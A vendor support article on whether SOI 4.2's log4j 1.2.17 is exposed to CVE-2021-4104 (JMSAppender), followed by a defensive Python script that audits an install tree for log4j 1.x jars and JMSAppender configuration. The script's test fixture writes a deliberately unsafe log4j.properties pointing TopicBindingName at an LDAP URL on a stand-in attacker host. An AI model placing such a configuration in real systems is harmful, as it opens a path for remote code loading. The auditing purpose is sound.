SOI CVE - log4j 1.2.17 - JMSAppender class
Article ID: 232308

Products

CA Service Operations Insight (SOI)

Issue/Introduction


SOI 4.2 CU2 uses log4j 1.2.17, which is affected by CVE-2021-4104 (the JMSAppender issue in log4j 1.x).

https://support.broadcom.com/external/content/security-advisory/Broadcom-Enterprise-Software-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/19792

Deleting the JMSAppender class from the log4j 1.x jar appears to be a general recommendation for other products.

Can the class also be disabled or removed in SOI, or will that lead to errors?

Environment

Release : 4.2

Component : Service Operations Insight (SOI) Manager

Resolution

SOI 4.2 CU4 removes the old log4j 1.x libraries and replaces them with Log4j 2.17.2. This is documented as a new feature in the release notes for SOI 4.2 CU4:

Log4j 2.17.2 Certification
The Log4j library version is upgraded to 2.17.2 to fix the security vulnerabilities.
Any updates to the log configurations (log4j.properties, log4j.xml) made before SOI 4.2 CU4 are not retained. The Log4j configuration files have changed and now use log4j2.xml files for configuration.

SOI 4.2 CU4

Additional Information

Official statement from SOI product management:

SOI is not impacted by this JMSAppender vulnerability (reported on log4j 1.x) out of the box, because we extended a few classes from this JMSAppender class and use a different configuration file to load the configuration.

So the attacker needs to have access to this configuration file to exploit this vulnerability; without that access it cannot be exploited.

The JMSAppender class from the log4j libraries cannot/should not be removed, as it will impact the functioning of SOI because we have extended this class.
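The two checks a practitioner would want after reading the above are (a) whether any log4j 1.x jar is still present in an install (it should be gone after SOI 4.2 CU4) and (b) whether any log4j configuration file actually wires up a JMSAppender, since CVE-2021-4104 only triggers when the configuration points JMSAppender at an attacker-chosen JNDI name (TopicBindingName / TopicConnectionFactoryBindingName). The following audit script is an added example, not Broadcom's or SOI's own tooling; it assumes log4j jars carry "log4j" in their filename and an Implementation-Version in their manifest, and it builds a constructed sample tree (a fake log4j-1.2.17.jar, a fake log4j-core-2.17.2.jar, one deliberately bad log4j.properties and one clean log4j2.xml) so it runs offline. Point `audit()` at a real install root to use it.

```python
"""Audit an install tree for log4j 1.x jars and for JMSAppender use in log configs."""
import os
import re
import tempfile
import zipfile

JMS_CLASS = "org/apache/log4j/net/JMSAppender.class"
CONFIG_NAMES = ("log4j.properties", "log4j.xml", "log4j2.xml")
# CVE-2021-4104 needs a JMSAppender configured with attacker-controlled JNDI names;
# a config that references any of these is what turns the class into a risk.
JMS_PATTERN = re.compile(
    r"JMSAppender|TopicBindingName|TopicConnectionFactoryBindingName", re.I
)


def jar_info(path):
    """Return (version, has_jms_appender) for a jar.

    Version comes from META-INF/MANIFEST.MF Implementation-Version, falling back
    to a log4j-<x.y.z> pattern in the filename (assumption: standard naming).
    """
    version = None
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        has_jms = JMS_CLASS in names
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if m:
                version = m.group(1)
    if version is None:
        m = re.search(r"log4j-?(\d+\.\d+\.\d+)", os.path.basename(path))
        version = m.group(1) if m else "unknown"
    return version, has_jms


def audit(root):
    """Walk root; report log4j 1.x jars and config files that reference JMSAppender."""
    findings = {"log4j1_jars": [], "jms_configs": []}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            lower = name.lower()
            if lower.endswith(".jar") and "log4j" in lower:
                version, has_jms = jar_info(full)
                if version.startswith("1."):
                    findings["log4j1_jars"].append(
                        (os.path.relpath(full, root), version, has_jms)
                    )
            elif lower in CONFIG_NAMES:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits = [ln.strip() for ln in fh if JMS_PATTERN.search(ln)]
                if hits:
                    findings["jms_configs"].append((os.path.relpath(full, root), hits))
    return findings


def build_sample_tree(root):
    """Constructed fixture for the demo; these are not real SOI files."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    with zipfile.ZipFile(os.path.join(lib, "log4j-1.2.17.jar"), "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nImplementation-Version: 1.2.17\n")
        zf.writestr(JMS_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    with zipfile.ZipFile(os.path.join(lib, "log4j-core-2.17.2.jar"), "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\nImplementation-Version: 2.17.2\n")
    # Deliberately dangerous log4j 1.x config: JMSAppender bound to a JNDI name.
    with open(os.path.join(root, "log4j.properties"), "w", encoding="utf-8") as fh:
        fh.write("log4j.rootLogger=INFO, jms\n"
                 "log4j.appender.jms=org.apache.log4j.net.JMSAppender\n"
                 "log4j.appender.jms.TopicBindingName=ldap://attacker.example/x\n")
    # Clean log4j2 config as shipped after the CU4-style upgrade.
    with open(os.path.join(root, "log4j2.xml"), "w", encoding="utf-8") as fh:
        fh.write("<Configuration><Appenders><Console name='c'/></Appenders>"
                 "</Configuration>\n")


def run_demo():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit(root)


if __name__ == "__main__":
    result = run_demo()
    for path, version, has_jms in result["log4j1_jars"]:
        print(f"log4j 1.x jar: {path} (version {version}, JMSAppender class present: {has_jms})")
    for path, hits in result["jms_configs"]:
        print(f"JMSAppender referenced in {path}:")
        for line in hits:
            print("   ", line)
```

On a real system the interesting outcome is the second list: a log4j 1.x jar that still contains JMSAppender is expected (and, per the statement above, must stay in place for SOI), whereas a configuration file that names JMSAppender or its Topic*BindingName properties is the thing to investigate, together with who has write access to that file.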